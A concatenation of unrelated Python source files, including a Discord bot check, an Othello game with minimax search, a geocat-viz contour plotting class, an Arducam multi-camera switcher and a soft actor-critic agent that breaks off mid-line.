Ellipsis(node): raise ValueError('Ellipsis (...) is not implemented.') import __future__ import unittest from api import VrayPropManApi class TestApi(unittest.TestCase): def setUp(self): unittest.TestCase.setUp(self) self._api = VrayPropManApi() def test_propname_index_mapping(self): prop_names = self._api.get_property_names() # test round trip mapping index_list = [self._api.get_property_index(name) for name in prop_names] test_vals = [self._api.get_property_name_from_index(index) for index in index_list] self.assertListEqual(prop_names, test_vals) if __name__ == '__main__': unittest.main() #!/usr/bin/env python3 # # Copyright (c) 2019 UAVCAN Development Team # This software is distributed under the terms of the MIT License. # Author: <> # import re import typing import textwrap import dataclasses import configparser import pyuavcan HEADER_SUFFIX = '\n' + '.' * 80 + '\n' cp = configparser.ConfigParser() cp.read('../setup.cfg') extras: typing.Dict[str, str] = dict(cp['options.extras_require']) print('If you need full-featured library, use this and read no more::', end='\n\n') print(f' pip install pyuavcan[{",".join(extras.keys())}]', end='\n\n') print('If you want to know what exactly you are installing, read on.', end='\n\n') @dataclasses.dataclass(frozen=True) class TransportOption: name: str class_name: str extras: typing.Dict[str, str] transport_options: typing.List[TransportOption] = [] # noinspection PyTypeChecker pyuavcan.util.import_submodules(pyuavcan.transport) for cls in pyuavcan.util.iter_descendants(pyuavcan.transport.Transport): transport_name = cls.__module__.split('.')[2] # pyuavcan.transport.X relevant_extras: typing.Dict[str, str] = {} for k in list(extras.keys()): if k.startswith(f'transport_{transport_name}'): relevant_extras[k] = extras.pop(k) transport_module_name = re.sub(r'\._[_a-zA-Z0-9]*', '', cls.__module__) transport_class_name = transport_module_name + '.' + cls.__name__ transport_options.append(TransportOption(name=transport_name, class_name=transport_class_name, extras=relevant_extras)) for to in transport_options: print(f'{to.name} transport' + HEADER_SUFFIX) print(f'This transport is implemented by :class:`{to.class_name}`.') if to.extras: print('The following installation options are available:') print() for key, deps in to.extras.items(): print(f'{key}') print(' This option pulls the following dependencies::', end='\n\n') print(textwrap.indent(deps.strip(), ' ' * 6), end='\n\n') else: print('This transport has no installation dependencies.') print() other_extras: typing.Dict[str, str] = {} for k in list(extras.keys()): if not k.startswith(f'transport_'): other_extras[k] = extras.pop(k) if other_extras: print('Other installation options' + HEADER_SUFFIX) print('These installation options are not related to any transport.', end='\n\n') for key, deps in other_extras.items(): print(f'{key}') print(' This option pulls the following dependencies:', end='\n\n') print(' .. code-block::', end='\n\n') print(textwrap.indent(deps.strip(), ' ' * 6), end='\n\n') print() if extras: raise RuntimeError(f'No known transports to match the following installation options (typo?): ' f'{list(extras.keys())}') Preen1/Antipetros_Discord_Bot """ [summary] [extended_summary] """ # region [Imports] # * Standard Library Imports ------------------------------------------------------------------------------------------------------------------------------------> # * Standard Library Imports --> import os # * Gid Imports --> import gidlogger as glog # * Local Imports --> from antipetros_discordbot.init_userdata.user_data_setup import ParaStorageKeeper # * Third Party Imports -----------------------------------------------------------------------------------------------------------------------------------------> # import requests # import pyperclip # import matplotlib.pyplot as plt # from bs4 import BeautifulSoup # from dotenv import load_dotenv # from discord import Embed, File # from github import Github, GithubException # from jinja2 import BaseLoader, Environment # from natsort import natsorted # from fuzzywuzzy import fuzz, process # * PyQt5 Imports -----------------------------------------------------------------------------------------------------------------------------------------------> # from PyQt5.QtGui import QFont, QIcon, QBrush, QColor, QCursor, QPixmap, QStandardItem, QRegExpValidator # from PyQt5.QtCore import (Qt, QRect, QSize, QObject, QRegExp, QThread, QMetaObject, QCoreApplication, # QFileSystemWatcher, QPropertyAnimation, QAbstractTableModel, pyqtSlot, pyqtSignal) # from PyQt5.QtWidgets import (QMenu, QFrame, QLabel, QAction, QDialog, QLayout, QWidget, QWizard, QMenuBar, QSpinBox, QCheckBox, QComboBox, QGroupBox, QLineEdit, # QListView, QCompleter, QStatusBar, QTableView, QTabWidget, QDockWidget, QFileDialog, QFormLayout, QGridLayout, QHBoxLayout, # QHeaderView, QListWidget, QMainWindow, QMessageBox, QPushButton, QSizePolicy, QSpacerItem, QToolButton, QVBoxLayout, QWizardPage, # QApplication, QButtonGroup, QRadioButton, QFontComboBox, QStackedWidget, QListWidgetItem, QSystemTrayIcon, QTreeWidgetItem, # QDialogButtonBox, QAbstractItemView, QCommandLinkButton, QAbstractScrollArea, QGraphicsOpacityEffect, QTreeWidgetItemIterator) # * Gid Imports -------------------------------------------------------------------------------------------------------------------------------------------------> # from antipetros_discordbot.utility.gidtools_functions import ( readit, clearit, readbin, writeit, loadjson, pickleit, writebin, pathmaker, writejson, # dir_change, linereadit, get_pickled, ext_splitter, appendwriteit, create_folder, from_dict_to_file) # * Local Imports -----------------------------------------------------------------------------------------------------------------------------------------------> # endregion[Imports] # region [TODO] # endregion [TODO] # region [AppUserData] # endregion [AppUserData] # region [Logging] log = glog.aux_logger(__name__) # endregion[Logging] # region [Constants] APPDATA = ParaStorageKeeper.get_appdata() BASE_CONFIG = ParaStorageKeeper.get_config('base_config') THIS_FILE_DIR = os.path.abspath(os.path.dirname(__file__)) # endregion[Constants] def user_not_blacklisted(bot, logger): async def predicate(ctx): if ctx.author.id in bot.blacklisted_user_ids(): log.warning('Tried invocation by blacklisted user: "%s", id: "%s"', ctx.author.name, str(ctx.author.id)) # TODO: maybe log reason for blacklist or tell reason # TODO: mark user as warned, then do not answer anymore, just delete the command # TODO: check if user is temporal blacklisted and tell him until when. # TODO: make as embed await ctx.send('''You are blacklisted, you can not use this bot and his commands anymore! If you think this is not correct please contact `@Giddi`! -This is the last time I am answering to and command from you, afterwards I will just delete your message!- This message will be removed in 2 minutes''', delete_after=120) await ctx.message.delete() return ctx.author.id not in bot.blacklisted_user_ids() return bot.add_check(predicate) # region[Main_Exec] if __name__ == '__main__': pass # endregion[Main_Exec] #!/usr/bin/python3 import os try: os.remove("pr_applicants.csv") except: print("already removed pr_applicants.csv") file = open("pr_applicants.csv", "w+") file.close() #Functions for game import numpy as np from matplotlib import pyplot as plt import time import random from random import choice import pickle from os.path import sep empty = 1 white = 0 black = 2 def createBoard(): board = np.empty((8,8)) for i in range(8): for j in range(8): board[i][j] = empty board[3][3] = white board[4][4] = white board[4][3] = black board[3][4] = black return board def countColor(board,color): colors = 0 for i in range(8): for j in range(8): if board[i][j] == color: colors += 1 return colors def weightedCountColor(board,color): colors = 0 for i in range(8): for j in range(8): if board[i][j] == color: if (i,j) == (0,0) or (i,j) == (0,7) or (i,j) == (7,0) or (i,j) == (7,7): colors += 1000 elif i == 0 or j == 0 or i == 7 or j == 7: colors += 100 else: colors += 1 return colors def onBoard(i,j,board): if (i <= board.shape[0]-1 and i >= 0) and (j <= board.shape[1]-1 and j >= 0):# You need some more conditions here! return True else: return False def getOtherColor(color): if color == white: return black elif color == black: return white else: return None def isSequence(placedChip,neighborChip,board): capturedColor = board[neighborChip[0]][neighborChip[1]] otherColor = getOtherColor(capturedColor) di = neighborChip[0] - placedChip[0] dj = neighborChip[1] - placedChip[1] currentCoords = (neighborChip) for i in range(1,8): if not onBoard(i * di + neighborChip[0],i * dj + neighborChip[1],board): return False currentCoords = (i * di + neighborChip[0],i * dj + neighborChip[1]) currentColor = board[currentCoords[0]][currentCoords[1]] if currentColor == otherColor: return True elif currentColor == capturedColor: continue elif currentColor == empty: return False def getPossibleMoves(color,board): possibleMoves = [] for i in range(8): for j in range(8): if board[i][j] == empty: for neighbor in [(i-1, j),(i, j-1),(i+1, j),(i, j+1),(i+1, j+1),(i-1, j+1),(i-1, j-1),(i+1, j-1)]: if onBoard(neighbor[0],neighbor[1],board) and board[neighbor[0]][neighbor[1]] == getOtherColor(color): if isSequence((i,j),neighbor,board): possibleMoves.append((i,j)) return possibleMoves def placeMarker(color,coordinates,boar): board = np.copy(boar) otherColor = getOtherColor(color) i = coordinates[0] j = coordinates[1] board[i][j] = color for neighbor in [(i-1, j),(i, j-1),(i+1, j),(i, j+1),(i+1, j+1),(i-1, j+1),(i-1, j-1),(i+1, j-1)]: if onBoard(neighbor[0],neighbor[1],board) and board[neighbor[0]][neighbor[1]] == getOtherColor(color): if isSequence((i,j),neighbor,board): board[neighbor[0]][neighbor[1]] = color di = neighbor[0] - i dj = neighbor[1] - j for y in range(1,8): if not onBoard(y * di + neighbor[0],y * dj + neighbor[1],board): break currentCoords = (y * di + neighbor[0],y * dj + neighbor[1]) currentColor = board[currentCoords[0]][currentCoords[1]] if currentColor == color: break elif currentColor == otherColor: board[y * di + neighbor[0]][y * dj + neighbor[1]] = color elif currentColor == empty: break return board def getMaxMove(turn,board): moves = getPossibleMoves(turn,board) maxMove = (-5,-5) maximum = 0 for move in moves: tempBoard = placeMarker(turn,move,board) num = countColor(tempBoard,turn) if num > maximum: maximum = num maxMove = move return maxMove def getSmartMove1D(turn,board): max_ = -1 maxMove = (-5,-5) moves = getPossibleMoves(turn,board) enemy = getOtherColor(turn) for moves in moves: tempBoard = placeMarker(turn,move,board) enemyMoves = getPossibleMoves(enemy,tempBoard) enemyMove = getMaxMove(enemy,tempBoard) tempBoard = placeMarker(enemy,enemyMove,tempBoard) num = countColor(tempBoard,turn) if num > max_: max_ = num maxMove = move return move def utility(turn, board): opponent = getOtherColor(turn) p = 0 m = 0 e = 0 for i in range(8): for j in range(8): if board[i][j] == empty: e += 1 elif board[i][j] == turn: p += 1 elif board[i][j] == opponent: m += 1 else: print("Critical Error") if e == 0 and p > m: return 100 elif e == 0 and p < m: return -100 else: return p - m def deep2(turn, board, turn0): op = getOtherColor(turn) maxMove = (-5,-5) ma = -999999999 if countColor(board,empty) == 0: return countColor(board,turn0) - countColor(board,getOtherColor(turn0)) moves = getPossibleMoves(turn, board) for move in moves: tempBoard = placeMarker(turn,move,board) opMove = getMaxMove(op,tempBoard) tempBoard = placeMarker(op,opMove,tempBoard) moves2 = getPossibleMoves(turn,tempBoard) for move2 in moves2: tempBoard2 = placeMarker(turn,move2,tempBoard) opMove = getMaxMove(op,tempBoard2) score = countColor(tempBoard2,turn) - countColor(tempBoard2,op) if score > ma: ma = score maxMove = move return maxMove def recursive(turn,board,turn0,depth): op = getOtherColor(turn) if countColor(board,empty) == 0 or depth == 6: return countColor(board,turn0) - countColor(board,getOtherColor(turn0)) moves = getPossibleMoves(turn, board) maxScore = -90 maxMove = (-5,-5) minScore = 90 for move in moves: tempBoard = placeMarker(turn,move,board) score = recursive(op,tempBoard,turn0,depth + 1) if score > maxScore: maxScore = score maxMove = move if score < minScore: minScore = score if depth == 0: return maxMove elif depth % 2 == 0: return maxScore elif depth % 2 == 1: return minScore def weightedRecursive(turn,board,turn0,depth): op = getOtherColor(turn) if countColor(board,empty) == 0 or depth == 6: return weightedCountColor(board,turn0) - weightedCountColor(board,getOtherColor(turn0)) moves = getPossibleMoves(turn, board) maxScore = -90 maxMove = (-5,-5) minScore = 90 for move in moves: tempBoard = placeMarker(turn,move,board) score = recursive(op,tempBoard,turn0,depth + 1) if score > maxScore: maxScore = score maxMove = move if score < minScore: minScore = score if depth == 0: return maxMove elif depth % 2 == 0: return maxScore elif depth % 2 == 1: return minScore def random(turn, board): moves = getPossibleMoves(turn, board) return random.choice(moves) def flipBoard(origionalBoard): board = np.copy(origionalBoard) for i in range(8): for j in range(8): if board[i][j] == white: board[i][j] = black elif board[i][j] == black: board[i][j] = white return board def generateGames(numGames): for i in range(1000000): movesBlack = [] board = createBoard() turn = white while countColor(board,empty) > 0: moves = getPossibleMoves(turn,board) if len(moves) == 0 and len(getPossibleMoves(getOtherColor(turn),board)) == 0: break if len(moves) == 0: turn = getOtherColor(turn) continue move = recursive(turn,board,turn,0) if turn == black: movesBlack.append((board,move)) else: movesBlack.append((flipBoard(board),move)) board = placeMarker(turn,move,board) turn = getOtherColor(turn) #print('black',countColor(board, black), 'white',countColor(board, white)) with open("Games2" + sep + str(i) + '_othello.pkl','wb') as outFile: pickle.dump(movesBlack,outFile) print(i) print('===================================================================================================') print('You, the player are playing the white pieces. The computer will play the black pieces') print('When it is your turn, the board will be shown with title "White\'s Turn"') print('Close the board and type in the i and j coordinates of your move when prompted by the terminal') print('If you choose an invalid move, the computer will say invalid move and show the board again. Close the board and type in your move coordinates') print('If your move is valid, the board will be shown with title "Black\'s turn, and your move will be shown on the board') print('Close the board and when the computer is done picking a move, the board will be shown with title "White\'s turn" and it will be your turn to move again.') print('Next time the game is updated, i will make it GUI based input so it is easier') print('===================================================================================================') print('') board = createBoard() turn = white plt.imshow(board,cmap = 'binary') plt.title("White's Turn") plt.xlabel('J') plt.ylabel('I') plt.show() boards = [] while not countColor(board,empty) == 0: if turn == white: i = input('i: ') j = input('j: ') if 'show' in i or 'show' in j: plt.imshow(board,cmap = 'binary') plt.title("White's Turn") plt.xlabel('J') plt.ylabel('I') plt.show() continue if 'last' in i or 'last' in j: for boar in boards[-3:]: plt.imshow(boar,cmap = 'binary') plt.show() continue i = int(i) j = int(j) move = (i,j) moves = getPossibleMoves(turn,board) if len(moves) == 0: turn = getOtherColor(turn) continue if not move in moves: plt.imshow(board,cmap = 'binary') plt.title("Not a Valid Move, Try Again") plt.xlabel('J') plt.ylabel('I') plt.show() continue board = placeMarker(turn,move,board) plt.imshow(board,cmap = 'binary') plt.title("Black's Turn") plt.xlabel('J') plt.ylabel('I') plt.show() turn = getOtherColor(turn) else: time.sleep(2) moves = getPossibleMoves(turn,board) if len(moves) == 0: turn = getOtherColor(turn) continue move = recursive(turn,board,turn,0)#deep2(turn,board,turn) board = placeMarker(turn,move,board) turn = getOtherColor(turn) for boar in boards: plt.imshow(boar,cmap='binary') plt.imshow(board,cmap = 'binary') plt.title("White's Turn") plt.xlabel('J') plt.ylabel('I') plt.show() boards.append(board) anissa111/geocat-viz """Plotting wrapper for matplotlib contourf function.""" import xarray as xr import warnings from ._plot_util import NCL_Plot class Contour(NCL_Plot): """Create contour plot with optional contour labels. Args: data (:class:`xarray.DataArray` or :class:`numpy.ndarray`): The dataset to plot. If inputted as a Xarray file, titles and labels will be automatically inferred. Kwargs: add_colorbar (:obj:`bool`): Whether a colorbar is added to the figure. Default True. clevels (:obj:`list` or :class:`numpy.ndarray`): List or array of levels to be passed into matplotlib's contour function. cmap (:class:`cmaps.colormap.Colormap`): Colormap for the filled contour graph. contour_fill (:obj:`bool`): Whether filled contours will be drawn. Default True. contour_lines (:obj:`bool`): Whether contours lines will be drawn. Default True. contourbackground (:obj:`bool`): Whether a white background for the contour labels will be drawn. Default False. contourfontsize (:obj:`int`): Font size of the contour line labels. Default 12. contourlabels (:obj:`list` or :class:`numpy.ndarray`): List or array of labels to use for contour line labels. drawcontourlabels(:obj:`bool`): Whether add contour line labels to the figure. flevels (:obj:`list` or :class:`numpy.ndarray`): List or array of levels to be passed into matplotlib's contourf function. linecolor (:obj:`str`): Color of the contour line. Default "black". linestyle (:obj:`str`): Linestyle of the contour line. Default solid for positive values, dashed for negative values. linewidth (:obj:`int`): Width of the contour lines. Default 0.4. manualcontourlabels (:obj:`bool`): Whether contour line labels should be manually drawn. Default False. projection (:obj:`str`): Cartopy map projection. `See Cartopy documentation for full list. `_ X (:class:`xarray.core.dataarray.DataArray'>` or :class:`numpy.ndarray`): The X axis data for the dataset. To be specified if not inferred correctly automatically. Y (:class:`xarray.core.dataarray.DataArray'>` or :class:`numpy.ndarray`): The Y axis data for the dataset. To be specified if not inferred correctly automatically. Return: (:class:`contourf.Contour`) A contour plot with specified input style. """ def __init__(self, *args, **kwargs): """Create contour figure. Generate filled contours and/or contour lines for figure. Add colorbar and contour labels if specified. Args: data (:class:`xarray.DataArray` or :class:`numpy.ndarray`): The dataset to plot. If inputted as a Xarray file, titles and labels will be automatically inferred. Kwargs: add_colorbar (:obj:`bool`): Whether a colorbar is added to the figure. Default True. clevels (:obj:`list` or :class:`numpy.ndarray`): List or array of levels to be passed into matplotlib's contour function. cmap (:class:`cmaps.colormap.Colormap`): Colormap for the filled contour graph. contour_fill (:obj:`bool`): Whether filled contours will be drawn. Default True. contour_lines (:obj:`bool`): Whether contours lines will be drawn. Default True. contourbackground (:obj:`bool`): Whether a white background for the contour labels will be drawn. Default False. contourfontsize (:obj:`int`): Font size of the contour line labels. Default 12. contourlabels (:obj:`list` or :class:`numpy.ndarray`): List or array of labels to use for contour line labels. drawcontourlabels(:obj:`bool`): Whether add contour line labels to the figure. flevels (:obj:`list` or :class:`numpy.ndarray`): List or array of levels to be passed into matplotlib's contourf function. linecolor (:obj:`str`): Color of the contour line. Default "black". linestyle (:obj:`str`): Linestyle of the contour line. Default solid for positive values, dashed for negative values. linewidth (:obj:`int`): Width of the contour lines. Default 0.4. manualcontourlabels (:obj:`bool`): Whether contour line labels should be manually drawn. Default False. projection (:obj:`str`): Cartopy map projection. `See Cartopy documentation for full list. `_ X (:class:`xarray.core.dataarray.DataArray'>` or :class:`numpy.ndarray`): The X axis data for the dataset. To be specified if not inferred correctly automatically. Y (:class:`xarray.core.dataarray.DataArray'>` or :class:`numpy.ndarray`): The Y axis data for the dataset. To be specified if not inferred correctly automatically. """ # Set default flevels, clevels, and colormap self._default_cmap = 'coolwarm' self._default_flevels = 5 self._default_clevels = 7 # Pull out args from data self.data = args[0] # If xarray file, format as Numpy array if isinstance(self.data, xr.DataArray): self.orig = self.data self.data = self.data.values # Read in or calculate filled levels using built in function if kwargs.get('contour_fill') is not False: if kwargs.get('flevels') is not None: # levels defined by kwargs self.levels = kwargs.get('flevels') elif kwargs.get('flevels') is None: # take a guess at filled levels self._estimate_flevels # Pull in X and Y axis data if specified if kwargs.get("X") is not None: self.X = kwargs.get("X") if kwargs.get("Y") is None: raise AttributeError("If X is defined, Y must also be defined.") else: self.X = kwargs.get("X") if kwargs.get("Y") is not None: self.Y = kwargs.get("Y") if kwargs.get("X") is None: raise AttributeError("If Y is defined, X must also be defined.") else: self.Y = kwargs.get("Y") # Pull in whether to draw filled contours and/or contour lines self.contour_lines = kwargs.get('contour_lines') self.contour_fill = kwargs.get('contour_fill') # Read in or calculate contour levels using built in function if kwargs.get('contour_lines') is not False: if kwargs.get('clevels') is not None: # levels defined by kwargs self.levels = kwargs.get('clevels') elif kwargs.get('clevels') is None: # take a guess at filled levels self._estimate_clevels # Read in style of contour lines if kwargs.get("linecolor") is None: self.linecolor = "black" else: self.linecolor = kwargs.get("linecolor") self.linestyle = kwargs.get("linestyle") if kwargs.get("linewidth") is None: self.linewidth = 0.4 else: self.linewidth = kwargs.get("linewidth") # Set colormap to specified or default value if kwargs.get('cmap') is not None: self.cmap = kwargs.get('cmap') else: self.cmap = self._default_cmap # Pull out contour line label specific kwargs if kwargs.get("drawcontourlabels") is not None: self.draw_contour_labels = kwargs.get("drawcontourlabels") else: self.draw_contour_labels = False if kwargs.get("manualcontourlabels") is not None: self.manualcontourlabels = kwargs.get("manualcontourlabels") else: self.manualcontourlabels = False self.contourlabels = kwargs.get("contourlabels") self.contourfontsize = kwargs.get("contourfontsize") self.contourbackground = kwargs.get("contourbackground") # Call parent class constructor NCL_Plot.__init__(self, *args, **kwargs) # Add filled contours and/or contour lines to figure, as specified self._generate_contours() # Set figure in NCL style self._set_NCL_style(self.ax) # If contour labels are requested, try to set them on contour lines. If failed, use filled contours if self.draw_contour_labels is True: try: self._add_contour_labels(self.ax, self.cl, contourlabels=self.contourlabels, fontsize=self.contourfontsize, background=self.contourbackground) except: if self.contour_fill is not False: self._add_contour_labels(self.ax, self.cf, contourlabels=self.contourlabels, fontsize=self.contourfontsize, background=self.contourbackground) # Call colorbar creation from parent class # Set colorbar if specified # If not a subplot and add_colorbar and contour_fill is not false, add colorbar if (((self.add_colorbar is not False) and (self.add_colorbar != 'off') and (kwargs.get('contour_fill') is not False) and (self.subplot is None)) or # If subplot, check if in last position in subplot and that add_colorbar is not False and plot ((self.subplot is not None) and (self.subplot[2] == self.subplot[0]) and (self.add_colorbar is not False) and (self.add_colorbar != "off"))): if self.contour_fill is not False: self._add_colorbar(mappable=self.cf) def _generate_contours(self, *args, **kwargs): """Generate filled contours and/or contour lines for figure. Kwargs: cmap (:class:`cmaps.colormap.Colormap`): Colormap for the filled contour graph. contour_fill (:obj:`bool`): Whether filled contours will be drawn. Default True. contour_lines (:obj:`bool`): Whether contours lines will be drawn. Default True. linecolor (:obj:`str`): Color of the contour line. Default "black". linestyle (:obj:`str`): Linestyle of the contour line. Default solid for positive values, dashed for negative values. linewidth (:obj:`int`): Width of the contour lines. Default 0.4. projection (:obj:`str`): Cartopy map projection. `See Cartopy documentation for full list. `_ X (:class:`xarray.core.dataarray.DataArray'>` or :class:`numpy.ndarray`): The X axis data for the dataset. To be specified if not inferred correctly automatically. Y (:class:`xarray.core.dataarray.DataArray'>` or :class:`numpy.ndarray`): The Y axis data for the dataset. To be specified if not inferred correctly automatically. """ # If there is a projection and specified X and Y data, plot filled contours and contour lines unless otherwise specified if (kwargs.get("projection") is not None): if (kwargs.get("X") is not None) and (kwargs.get("Y") is not None): # Create plot if self.contour_fill is not False: self.cf = self.ax.contourf(self.X.data, self.Y.data, self.data, levels=self.levels, cmap=self.cmap, transform=self.projection, extent=[ self.xlim[0], self.xlim[1], self.ylim[0], self.ylim[1] ], extend=self.cbextend) if self.contour_lines is not False: self.cl = self.ax.contour(self.X.data, self.Y.data, self.data, levels=self.levels, colors=self.linecolor, alpha=0.8, linewidths=self.linewidth, linestyles=self.linestyle, transform=self.projection, extent=[ self.xlim[0], self.xlim[1], self.ylim[0], self.ylim[1] ], extend=self.cbextend) # If there is a projection and no specified X and Y data, plot filled contours and contour lines unless otherwise specified else: # Create plot if self.contour_fill is not False: self.cf = self.ax.contourf(self.data, levels=self.levels, cmap=self.cmap, transform=self.projection, extent=[ self.xlim[0], self.xlim[1], self.ylim[0], self.ylim[1] ], extend=self.cbextend) if self.contour_lines is not False: self.cl = self.ax.contour(self.data, levels=self.levels, colors=self.linecolor, alpha=0.8, linewidths=self.linewidth, linestyles=self.linestyle, transform=self.projection, extent=[ self.xlim[0], self.xlim[1], self.ylim[0], self.ylim[1] ], extend=self.cbextend) # If there is not a specified projection and specified X and Y data, plot filled contours and contour lines unless otherwise specified else: if (kwargs.get("X") is not None) and (kwargs.get("Y") is not None): # Create plot if self.contour_fill is not False: self.cf = self.ax.contourf(self.X.data, self.Y.data, self.data, levels=self.levels, cmap=self.cmap, extent=[ self.xlim[0], self.xlim[1], self.ylim[0], self.ylim[1] ], extend=self.cbextend) if self.contour_lines is not False: self.cl = self.ax.contour(self.X.data, self.Y.data, self.data, levels=self.levels, colors=self.linecolor, alpha=0.8, linewidths=self.linewidth, linestyles=self.linestyle, extent=[ self.xlim[0], self.xlim[1], self.ylim[0], self.ylim[1] ], extend=self.cbextend) # If there is not a specified projection and no specified X and Y data, plot filled contours and contour lines unless otherwise specified else: # Create plot if self.contour_fill is not False: self.cf = self.ax.contourf(self.data, levels=self.levels, cmap=self.cmap, extent=[ self.xlim[0], self.xlim[1], self.ylim[0], self.ylim[1] ], extend=self.cbextend) if self.contour_lines is not False: self.cl = self.ax.contour(self.data, levels=self.levels, colors=self.linecolor, alpha=0.8, linewidths=self.linewidth, linestyles=self.linestyle, extent=[ self.xlim[0], self.xlim[1], self.ylim[0], self.ylim[1] ], extend=self.cbextend) def _add_contour_labels(self, ax, lines, contourlabels=None, background=True, fontsize=12): """Add contour line labels with an optional white background to the figure. Kwargs: contourbackground (:obj:`bool`): Whether a white background for the contour labels will be drawn. Default False. contourfontsize (:obj:`int`): Font size of the contour line labels. Default 12. contourlabels (:obj:`list` or :class:`numpy.ndarray`): List or array of labels to use for contour line labels. drawcontourlabels(:obj:`bool`): Whether add contour line labels to the figure. flevels (:obj:`list` or :class:`numpy.ndarray`): List or array of levels to be passed into matplotlib's contourf function. manualcontourlabels (:obj:`bool`): Whether contour line labels should be manually drawn. Default False. """ # Update argument definitions if self.contourfontsize is not None: fontsize = self.contourfontsize # If level range is less than 1, set labels with smaller differences between them if (self.levels[-1] - self.levels[0]) <= 1: fmt = '%0.2f' else: fmt = '%d' # Set contour line labels based on inputted arguments. Depending on which arguments are included or not, contour labels must be created differently. if self.contourlabels is None: ax.clabel(lines, fontsize=fontsize, fmt=fmt, inline=True, colors="black") elif self.manualcontourlabels is False: ax.clabel(lines, contourlabels, fontsize=fontsize, fmt=fmt, inline=True, colors="black") elif self.manualcontourlabels is True: ax.clabel(lines, fontsize=fontsize, fmt=fmt, inline=True, manual=contourlabels, colors="black") else: raise AttributeError( "Manualcontourlabels, if set, must be True or False.") # Add white background to contour line labels if background is True: [ txt.set_bbox(dict(facecolor='white', edgecolor='none', pad=2)) for txt in lines.labelTexts ] def _estimate_flevels(self): # TODO: flesh out print("estimate flevels") def _estimate_clevels(self): # TODO: flesh out print("estimate clevels") 1-10 import asyncio import discord import time from operator import itemgetter from discord.ext import commands from Cogs import ReadableTime # This is the Uptime module. It keeps track of how long the bot's been up class Uptime: # Init with the bot reference, and a reference to the settings var def __init__(self, bot): self.bot = bot self.startTime = int(time.time()) def message(self, message): # Check the message and see if we should allow it - always yes. # This module doesn't need to cancel messages. return { 'Ignore' : False, 'Delete' : False} @commands.command(pass_context=True) async def uptime(self, ctx): """Lists the bot's uptime.""" currentTime = int(time.time()) timeString = ReadableTime.getReadableTimeBetween(self.startTime, currentTime) msg = 'I\'ve been up for *{}*.'.format(timeString) await self.bot.send_message(ctx.message.channel, msg)import RPi.GPIO as gp import os import cv2 as cv import numpy as np import time class MultiAdapter: camNum = 4 adapter_info = { "A":{ "i2c_cmd":"i2cset -y 0 0x70 0x00 0x04", "gpio_sta":[0,0,1], }, "B":{ "i2c_cmd":"i2cset -y 0 0x70 0x00 0x05", "gpio_sta":[1,0,1], }, "C":{ "i2c_cmd":"i2cset -y 0 0x70 0x00 0x06", "gpio_sta":[0,1,0], }, "D":{ "i2c_cmd":"i2cset -y 0 0x70 0x00 0x07", "gpio_sta":[1,1,0], }, } camera = cv.VideoCapture(0) width = 320 height = 240 def __init__(self): gp.setwarnings(False) gp.setmode(gp.BOARD) gp.setup(7, gp.OUT) gp.setup(11,gp.OUT) gp.setup(12,gp.OUT) def choose_channel(self,index): channel_info = self.adapter_info.get(index) if channel_info == None: print("Can't get this info") os.system(channel_info["i2c_cmd"]) # i2c write gpio_sta = channel_info["gpio_sta"] # gpio write gp.output(7, gpio_sta[0]) gp.output(11, gpio_sta[1]) gp.output(12, gpio_sta[2]) def select_channel(self,index): channel_info = self.adapter_info.get(index) if channel_info == None: print("Can't get this info") gpio_sta = channel_info["gpio_sta"] # gpio write gp.output(7, gpio_sta[0]) gp.output(11, gpio_sta[1]) gp.output(12, gpio_sta[2]) def init(self,width,height): for i in range(self.camNum): self.height = height self.width = width self.choose_channel(chr(65+i)) self.camera.set(3, self.width) self.camera.set(4, self.height) ret, frame = self.camera.read() if ret == True: print("camera %s init OK" %(chr(65+i))) pname = "image_"+ chr(65+i)+".jpg" cv.imwrite(pname,frame) time.sleep(1) def preview(self): font = cv.FONT_HERSHEY_PLAIN fontScale = 1 fontColor = (255,255,255) lineType = 1 factor = 20 black = np.zeros(((self.height+factor)*2, self.width*2, 3), dtype= np.uint8) i = 0 while True: self.select_channel(chr(65+i)) ret, frame = self.camera.read() ret, frame = self.camera.read() ret, frame = self.camera.read() frame.dtype=np.uint8 if i == 0: black[factor:factor+self.height, 0:self.width, :] = frame bottomLeftCornerOfText = (factor,factor) index = chr(65+i) elif i == 1: black[factor:factor+self.height, self.width:self.width*2,:] = frame bottomLeftCornerOfText = (factor+self.width, factor) index = chr(65+i) elif i == 2: black[factor*2+self.height:factor*2+self.height*2, 0:self.width,:] = frame bottomLeftCornerOfText = (factor, factor*2+self.height) index = chr(65+i) elif i == 3: black[factor*2+self.height:factor*2+self.height*2, self.width:self.width*2,:] = frame bottomLeftCornerOfText = (factor+self.width, factor*2+self.height) index = chr(65+i) i = i+1 if i==self.camNum: i = 0 cv.putText(black,'CAM '+index, bottomLeftCornerOfText, font, fontScale,fontColor,lineType) cv.imshow("Arducam Multi Camera Demo",black) if cv.waitKey(1) & 0xFF == ord('q'): del frame self.camera.release() cv.destroyAllWindows() break from django.db.models import fields from django.db.models.base import Model from rest_framework import serializers from .models import Pattern class PatternSerializer(serializers.ModelSerializer): class Meta: model = Pattern fields = "__all__" 1-10 import torch import torch.nn as nn import torch.nn.functional as F from agents.ac_dgn import ActorCriticDGNAgent from agents.sdgn import soft_value_based_model_entropy_activation_function from utils.hparams import hparams from utils.numba_utils import * from utils.torch_utils import * soft_actor_critic_model_entropy_activation_function = soft_value_based_model_entropy_activation_function class SoftActorCriticDGNAgent(ActorCriticDGNAgent): def __init__(self, in_dim, act_dim): super(SoftActorCriticDGNAgent, self).__init__(in_dim, act_dim) self.alpha = torch.nn.Parameter(torch.tensor([0.1]), requires_grad=True) self.target_entropy = -np.log(1.0 / self.act_dim) * hparams['entropy_target_factor'] def cal_q_loss(self, sample, losses, log_vars=None, global_steps=None): obs = sample['obs'] adj = sample['adj'] action = sample['action'] reward = sample['reward'] next_obs = sample['next_obs'] next_adj = sample['next_adj'] done = sample['done'] batch_size, n_ant, _ = obs.shape # q_values : [b,n_agent,n_action] q_values = self.critic_learned_model(obs, adj) # target_q_values: [b,n_agent,] with torch.no_grad(): # Soft Value Function: V(s) = E_a[Q'(s',a')-log\pi(a'|s')] = \Sigma (\pi(a'|s') * Q'(s',a') - log\pi(a'|s')) next_probs, next_log_probs = self.actor_learned_model(next_obs, next_adj, return_log_pi=True) v_values, _ = self.critic_target_model(next_obs, next_adj) v_values = (next_probs * (v_values - self.alpha * next_log_probs)).sum(dim=-1) v_values = v_values.cpu().numpy() # [batch, n_agent] target_q_values = v_values numpy_q_values = q_values.detach().cpu().numpy() expected_q = numba_get_expected_q(numpy_q_values, action.cpu().numpy(), reward.cpu().numpy(), done.cpu().numpy(), hparams['gamma'], target_q_values, batch_size, n_ant) # q_loss: MSE calculated on the sampled action index! q_loss = (q_values - 